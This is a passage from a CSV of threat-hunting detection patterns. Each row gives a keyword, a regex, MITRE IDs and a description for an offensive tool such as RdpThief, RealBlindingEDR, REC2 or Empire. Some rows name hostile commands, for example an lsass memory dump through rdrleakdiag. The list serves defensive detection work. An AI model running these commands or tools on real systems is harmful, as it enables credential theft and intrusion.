"*RDPHijack-BOF*",".{0,1000}RDPHijack\-BOF.{0,1000}","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","Lateral Movement","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","N/A","3","298","46","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z","56462" "*RDPInception*",".{0,1000}RDPInception.{0,1000}","offensive_tool_keyword","RDPInception","A proof of concept for the RDP Inception Attack","T1188 - T1214 - T1555.003","TA0007 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/mdsecactivebreach/RDPInception","1","1","N/A","N/A","N/A","4","347","325","2017-06-29T16:57:25Z","2017-06-29T10:08:23Z","56463" "*RDPKeylog.exe*",".{0,1000}RDPKeylog\.exe.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","56464" "*RDPReplayer.py*",".{0,1000}RDPReplayer\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","56465" "*rdpscraper*",".{0,1000}rdpscraper.{0,1000}","offensive_tool_keyword","rdpscraper","rdpscraper - Enumerates users based off RDP Screenshots","T1110 - T1189 - T1056.001","TA0006 - TA0008 - 
TA0011","N/A","N/A","Reconnaissance","https://github.com/x90skysn3k/rdpscraper","1","1","N/A","N/A","N/A","1","34","15","2023-10-25T21:17:52Z","2017-07-19T17:02:24Z","56466" "*RDPSpray*",".{0,1000}RDPSpray.{0,1000}","offensive_tool_keyword","RDPSpray","Tool for password spraying RDP","T1110.001 - T1555.002","TA0006 - TA0040 - TA0003","N/A","N/A","Credential Access","https://github.com/dafthack/RDPSpray","1","1","N/A","N/A","N/A","1","95","28","2018-10-12T18:32:51Z","2018-10-12T18:29:52Z","56467" "*RDPStrike enabled*",".{0,1000}RDPStrike\senabled.{0,1000}","offensive_tool_keyword","RdpStrike","Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP","T1081 - T1055.011 - T1012 - T1113 - T1040 - T1185","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xEr3bus/RdpStrike","1","0","N/A","N/A","10","3","238","27","2024-06-11T19:40:05Z","2024-06-11T19:31:50Z","56468" "*RdpStrike.x64.bin*",".{0,1000}RdpStrike\.x64\.bin.{0,1000}","offensive_tool_keyword","RdpStrike","Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP","T1081 - T1055.011 - T1012 - T1113 - T1040 - T1185","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xEr3bus/RdpStrike","1","1","N/A","N/A","10","3","238","27","2024-06-11T19:40:05Z","2024-06-11T19:31:50Z","56469" "*RdpThief enabled *",".{0,1000}RdpThief\senabled\s.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","0","#content","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","56470" "*RdpThief.*",".{0,1000}RdpThief\..{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","N/A","10","10","1518","221","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z","56471" "*RdpThief.dll*",".{0,1000}RdpThief\.dll.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","1","N/A","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","56472" "*RdpThief.exe*",".{0,1000}RdpThief\.exe.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - 
T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","1","N/A","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","56473" "*RdpThief_x64.tmp*",".{0,1000}RdpThief_x64\.tmp.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","0","N/A","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","56474" "*rdrleakdiag.exe -p (Get-Process lsass)*",".{0,1000}rdrleakdiag\.exe\s\-p\s\(Get\-Process\slsass\).{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","56478" "*rdrleakdiag.py*",".{0,1000}rdrleakdiag\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","56479" "*read_cs_teamserver*",".{0,1000}read_cs_teamserver.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","56483" "*README-FILE-#COMPUTER#-#TIME#.hta*",".{0,1000}README\-FILE\-\#COMPUTER\#\-\#TIME\#\.hta.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56486" "*readShellcode*",".{0,1000}readShellcode.{0,1000}","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 
- T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","N/A","10","10","1109","180","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z","56487" "*ReadyToPhish.xls*",".{0,1000}ReadyToPhish\.xls.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","56488" "*reagentc /disable >nul*",".{0,1000}reagentc\s\/disable\s\>nul.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","56489" "*RealBey/ThisIsNotRat*",".{0,1000}RealBey\/ThisIsNotRat.{0,1000}","offensive_tool_keyword","ThisIsNotRat","control windows 
computeur from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","1","N/A","N/A","9","10","64","17","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z","56490" "*RealBlindingEDR.cpp*",".{0,1000}RealBlindingEDR\.cpp.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","1","N/A","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","56491" "*RealBlindingEDR.exe*",".{0,1000}RealBlindingEDR\.exe.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","1","N/A","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","56492" "*RealBlindingEDR.h*",".{0,1000}RealBlindingEDR\.h.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","N/A","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","56493" "*RealBlindingEDR/releases*",".{0,1000}RealBlindingEDR\/releases.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","1","N/A","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","56494" "*Real-Passwords*",".{0,1000}Real\-Passwords.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","9","10","8895","1608","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z","56495" "*Reaper.exe kp 
*",".{0,1000}Reaper\.exe\skp\s.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","N/A","10","2","158","34","2024-12-07T01:52:58Z","2023-09-21T02:09:48Z","56499" "*Reaper.exe sp *",".{0,1000}Reaper\.exe\ssp\s.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","N/A","10","2","158","34","2024-12-07T01:52:58Z","2023-09-21T02:09:48Z","56500" "*Reaper-main.zip*",".{0,1000}Reaper\-main\.zip.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","N/A","10","2","158","34","2024-12-07T01:52:58Z","2023-09-21T02:09:48Z","56501" "*rebootuser/LinEnum*",".{0,1000}rebootuser\/LinEnum.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","56502" "*rec_rans@aol.com*",".{0,1000}rec_rans\@aol\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56503" "*REC2 implant for Mastodon*",".{0,1000}REC2\simplant\sfor\sMastodon.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","56504" "*REC2 implant for VirusTotal*",".{0,1000}REC2\simplant\sfor\sVirusTotal.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - 
T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","56505" "*rec2::modules::rec2mastodon*",".{0,1000}rec2\:\:modules\:\:rec2mastodon.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","56506" "*rec2_mastodon_x64.exe*",".{0,1000}rec2_mastodon_x64\.exe.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","56507" "*rec2_virustotal_x64.exe*",".{0,1000}rec2_virustotal_x64\.exe.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","56508" "*rec2mastodon.rs*",".{0,1000}rec2mastodon\.rs.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - 
TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","56509" "*rec2virustotal*",".{0,1000}rec2virustotal.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","56510" "*rec2virustotal.rs*",".{0,1000}rec2virustotal\.rs.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","56511" "*reCAPTCHA Verification ID: 146820*",".{0,1000}reCAPTCHA\sVerification\sID\:\s\146820\<\/span\>.{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - T1204.002 - T1071.003","TA0001 - TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","0","#content","N/A","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","56512" "*recaptcha-phish-main.zip*",".{0,1000}recaptcha\-phish\-main\.zip.{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - T1204.002 - T1071.003","TA0001 - TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","1","N/A","N/A","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","56513" "*Receive a file via DoH*",".{0,1000}Receive\sa\sfile\svia\sDoH.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and 
Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","56514" "*Receive-AgentJob*",".{0,1000}Receive\-AgentJob.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1054","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - 
Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","56515" "*Received Mythic SOCKS task: *",".{0,1000}Received\sMythic\sSOCKS\stask\:\s.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","56516" "*Received version from PSEXECSVC: *",".{0,1000}Received\sversion\sfrom\sPSEXECSVC\:\s.{0,1000}","offensive_tool_keyword","susinternals","python implementation of PSExec native service implementation","T1569.002 - T1021.002 - T1035","TA0002 - TA0004 - TA0008 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/susinternals","1","0","#content","N/A","7","2","194","18","2025-02-11T09:34:50Z","2025-02-10T07:40:36Z","56518" "*reciclador.cpp*",".{0,1000}reciclador\.cpp.{0,1000}","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform Lateral Movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","N/A","10","8","741","114","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z","56519" "*reciclador.dll*",".{0,1000}reciclador\.dll.{0,1000}","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform Lateral Movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral 
Movement","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","N/A","10","8","741","114","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z","56520" "*reciclador.vcxproj*",".{0,1000}reciclador\.vcxproj.{0,1000}","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform Lateral Movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","N/A","10","8","741","114","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z","56521" "*recon_passive.rb*",".{0,1000}recon_passive\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","56522" "*Recon-AD-*.dll*",".{0,1000}Recon\-AD\-.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - 
